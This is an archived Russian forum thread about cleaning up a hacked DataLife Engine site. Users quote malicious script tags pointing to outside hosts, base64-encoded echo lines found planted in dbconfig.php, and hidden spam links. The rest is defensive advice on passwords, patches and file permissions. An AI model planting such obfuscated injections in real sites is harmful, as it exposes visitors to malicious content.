alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Здравствуйте. Сегодня утром обнаружил, что оказывается на сайте уже 3 админа ( вместе со мною).Естественно принял меры. Двоих удалил. Поменял пароль ну и другие меры. Также обнаружил, что в шапке сайта прописан код <script language="JavaScript" type="text/javascript" charset="windows-1251" src="http://tizmax.ru/codes/iframe.php?id=90"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7514"></script>.Кто сталкивался с этой проблемой подскажите как удалить эту заразу. Заранее благодарен. Ссылка на сообщение Поделиться на других сайтах
zgr 72 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Для начала смените пароли на хостинговую панель управления, БД, ФТП и админку. Больше тут ничего не посоветуешь. Удалите лишний код вручную из шаблонов. Ссылка на сообщение Поделиться на других сайтах
alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Автор Для начала смените пароли на БД, ФТП и админку. Больше тут ничего не посоветуешь. Удалите лишний код вручную из шаблонов. Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет. Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет. И не забудьте поставить патчи http://dle-news.ru/bags/ Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь. Убрал бы права на запись, оставив 444, это ты уже сам догадаешься. Ссылка на сообщение Поделиться на других сайтах
alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Автор Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь. Убрал бы права на запись, оставив 444, это ты уже сам догадаешься. Победа за нами. Код найден, удален. 1. В папке templates файл sistem.php вирус. 2. В файле dbconfig.php код echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBjaGFyc2V0PSJ3aW5kb3dzLTEyNTEiIHNyYz0iaHR0cDovL3Rpem1heC5ydS9jb2Rlcy9pZnJhbWUucGhwP2lkPTkwIj48L3NjcmlwdD4='); echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc1MTQiPjwvc2NyaXB0Pg=='); Вывод: Надо больше внимания уделять безопасности сайта. Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Вывод: Надо больше внимания уделять безопасности сайта. Надо вовремя обновляться и ставить патчи. Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 n0lik, В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись. Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 n0lik, В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись. скажите тогда как будет вести себя веб шелл в папке /engine/ если злоумышленник залил его по фтп? Тут уже никакие права доступа и прочее НЕПОМОЖЕТ, имхо права для доступа\записи это только часть. Защищаться нужно не от взломщика а нужно защищать своё железо от вирусов. не более. Ссылка на сообщение Поделиться на других сайтах
celsoft 6265 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Победа за нами. Код найден, удален. Это не надолго, вам же написали, что ставьте патчи http://dle-news.ru/bags/ а вы этого до сих пор не сделали. Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 hotdj, А если злоумышленник получил доступ к вашей почте? Ссылка на сообщение Поделиться на других сайтах
temius 1 Опубликовано: 29 ноября 2010 Рассказать Опубликовано: 29 ноября 2010 таже фигня Наглые рожи прям в главную страницу вставили <html><div style="position:absolute;top:-1000px;left:-1000px"><a href="http://new.turbinist.ru/uploads/images/index.html">Главная</a><br><a href="http://mysite.ru/uploads/images/sitemap.html">Знакомства любовь секс</a><br><a href="http://mysite.ru/uploads/images/minsk-znakomstva-devushki.html">Минск знакомства девушки</a><br><a href="http://mysite.ru/uploads/images/krivoy-rog-intim-znakomstva.html">Кривой рог интим знакомства</a><br></div></html> </html> в папку upload залили папку image,а в ней не поверите .html файлов аж на 27 метров :D :D и все про порно)). точно прийдется код доступа в панель хостинга)) Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.